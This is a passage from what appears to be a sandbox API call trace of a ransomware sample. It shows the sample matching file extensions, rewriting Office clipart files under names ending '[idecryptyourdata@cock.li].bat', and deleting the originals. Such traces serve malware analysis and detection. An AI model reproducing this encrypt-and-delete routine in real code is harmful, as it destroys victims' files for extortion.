-1 [0182.523] lstrlenW (lpString=".pdf") returned 4 [0182.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.523] lstrlenW (lpString=".xls") returned 4 [0182.523] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.523] lstrlenW (lpString=".xlsx") returned 5 [0182.523] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.523] lstrlenW (lpString=".ppt") returned 4 [0182.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.524] lstrlenW (lpString=".zip") returned 4 [0182.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.524] lstrlenW (lpString=".rar") returned 4 [0182.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.524] lstrlenW (lpString=".bz2") returned 4 [0182.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.524] lstrlenW (lpString=".7z") returned 3 [0182.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.524] lstrlenW (lpString=".dbf") returned 4 [0182.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.524] lstrlenW (lpString=".1cd") returned 4 [0182.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.524] lstrlenW (lpString=".jpg") returned 4 [0182.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.525] lstrlenW (lpString=".doc") returned 4 [0182.525] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.525] lstrlenW (lpString=".docx") returned 5 [0182.525] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.525] lstrlenW (lpString=".pdf") returned 4 [0182.525] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.525] lstrlenW (lpString=".xls") returned 4 [0182.525] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.525] lstrlenW (lpString=".xlsx") returned 5 [0182.525] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.525] lstrlenW (lpString=".ppt") returned 4 [0182.525] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.525] lstrlenW (lpString=".zip") returned 4 [0182.525] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.525] lstrlenW (lpString=".rar") returned 4 [0182.526] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.526] lstrlenW (lpString=".bz2") returned 4 [0182.526] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.526] lstrlenW (lpString=".7z") returned 3 [0182.526] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.526] lstrlenW (lpString=".dbf") returned 4 [0182.526] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.526] lstrlenW (lpString=".1cd") returned 4 [0182.526] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.526] lstrlenW (lpString=".jpg") returned 4 [0182.526] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.526] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.526] lstrlenW (lpString="J0106208.WMF") returned 12 [0182.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.527] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=11900) returned 1 [0182.527] CloseHandle (hObject=0x378) returned 1 [0182.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf")) returned 0x220 [0182.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.528] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.528] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.529] GetLastError () returned 0x0 [0182.529] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2e7c, lpOverlapped=0x0) returned 1 [0182.531] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2e80, lpOverlapped=0x0) returned 1 [0182.532] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.532] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.532] SetEndOfFile (hFile=0x37c) returned 1 [0182.533] CloseHandle (hObject=0x37c) returned 1 [0182.533] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.533] SetEndOfFile (hFile=0x378) returned 1 [0182.534] CloseHandle (hObject=0x378) returned 1 [0182.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106208.wmf")) returned 1 [0182.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.534] lstrlenW (lpString=".doc") returned 4 [0182.534] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.534] lstrlenW (lpString=".docx") returned 5 [0182.535] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.535] lstrlenW (lpString=".pdf") returned 4 [0182.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString=".xls") returned 4 [0182.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.535] lstrlenW (lpString=".xlsx") returned 5 [0182.535] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.535] lstrlenW (lpString=".ppt") returned 4 [0182.535] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.535] lstrlenW (lpString=".zip") returned 4 [0182.535] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.535] lstrlenW (lpString=".rar") returned 4 [0182.535] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString=".bz2") returned 4 [0182.535] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString=".7z") returned 3 [0182.535] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.535] lstrlenW (lpString=".dbf") returned 4 [0182.535] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.535] lstrlenW (lpString=".1cd") returned 4 [0182.535] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.535] lstrlenW (lpString=".jpg") returned 4 [0182.535] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.536] lstrlenW (lpString=".doc") returned 4 [0182.536] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString=".docx") returned 5 [0182.536] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.536] lstrlenW (lpString=".pdf") returned 4 [0182.536] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString=".xls") returned 4 [0182.536] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.536] lstrlenW (lpString=".xlsx") returned 5 [0182.536] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.536] lstrlenW (lpString=".ppt") returned 4 [0182.536] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.536] lstrlenW (lpString=".zip") returned 4 [0182.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.536] lstrlenW (lpString=".rar") returned 4 [0182.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString=".bz2") returned 4 [0182.536] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString=".7z") returned 3 [0182.536] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.536] lstrlenW (lpString=".dbf") returned 4 [0182.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.536] lstrlenW (lpString=".1cd") returned 4 [0182.536] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106208.WMF") returned 68 [0182.536] lstrlenW (lpString=".jpg") returned 4 [0182.537] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.537] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.537] lstrlenW (lpString="J0106222.WMF") returned 12 [0182.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.537] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=19600) returned 1 [0182.538] CloseHandle (hObject=0x378) returned 1 [0182.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf")) returned 0x220 [0182.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.538] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.538] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.539] GetLastError () returned 0x0 [0182.539] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x4c90, lpOverlapped=0x0) returned 1 [0182.826] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x4ca0, lpOverlapped=0x0) returned 1 [0182.827] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.827] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.828] SetEndOfFile (hFile=0x37c) returned 1 [0182.828] CloseHandle (hObject=0x37c) returned 1 [0182.828] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.828] SetEndOfFile (hFile=0x378) returned 1 [0182.829] CloseHandle (hObject=0x378) returned 1 [0182.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.829] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf")) returned 1 [0182.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.829] lstrlenW (lpString=".doc") returned 4 [0182.829] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.829] lstrlenW (lpString=".docx") returned 5 [0182.830] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.830] lstrlenW (lpString=".pdf") returned 4 [0182.830] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString=".xls") returned 4 [0182.830] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.830] lstrlenW (lpString=".xlsx") returned 5 [0182.830] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.830] lstrlenW (lpString=".ppt") returned 4 [0182.830] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.830] lstrlenW (lpString=".zip") returned 4 [0182.830] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.830] lstrlenW (lpString=".rar") returned 4 [0182.830] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString=".bz2") returned 4 [0182.830] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString=".7z") returned 3 [0182.830] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.830] lstrlenW (lpString=".dbf") returned 4 [0182.830] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.830] lstrlenW (lpString=".1cd") returned 4 [0182.830] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.830] lstrlenW (lpString=".jpg") returned 4 [0182.830] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.830] lstrlenW (lpString=".doc") returned 4 [0182.830] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.830] lstrlenW (lpString=".docx") returned 5 [0182.830] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.830] lstrlenW (lpString=".pdf") returned 4 [0182.830] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.831] lstrlenW (lpString=".xls") returned 4 [0182.831] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.831] lstrlenW (lpString=".xlsx") returned 5 [0182.831] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.831] lstrlenW (lpString=".ppt") returned 4 [0182.831] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.831] lstrlenW (lpString=".zip") returned 4 [0182.831] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.831] lstrlenW (lpString=".rar") returned 4 [0182.831] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.831] lstrlenW (lpString=".bz2") returned 4 [0182.831] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.831] lstrlenW (lpString=".7z") returned 3 [0182.831] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.831] lstrlenW (lpString=".dbf") returned 4 [0182.831] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.831] lstrlenW (lpString=".1cd") returned 4 [0182.831] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF") returned 68 [0182.831] lstrlenW (lpString=".jpg") returned 4 [0182.831] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.831] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.831] lstrlenW (lpString="J0107146.WMF") returned 12 [0182.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.832] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=14996) returned 1 [0182.832] CloseHandle (hObject=0x378) returned 1 [0182.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf")) returned 0x220 [0182.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.832] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.832] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.833] GetLastError () returned 0x0 [0182.833] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3a94, lpOverlapped=0x0) returned 1 [0182.835] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3aa0, lpOverlapped=0x0) returned 1 [0182.836] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.836] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.836] SetEndOfFile (hFile=0x37c) returned 1 [0182.836] CloseHandle (hObject=0x37c) returned 1 [0182.836] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.836] SetEndOfFile (hFile=0x378) returned 1 [0182.837] CloseHandle (hObject=0x378) returned 1 [0182.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf")) returned 1 [0182.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 68 [0182.837] lstrlenW (lpString=".doc") returned 4 [0182.838] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString=".docx") returned 5 [0182.838] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.838] lstrlenW (lpString=".pdf") returned 4 [0182.838] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString=".xls") returned 4 [0182.838] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.838] lstrlenW (lpString=".xlsx") returned 5 [0182.838] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.838] lstrlenW (lpString=".ppt") returned 4 [0182.838] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") 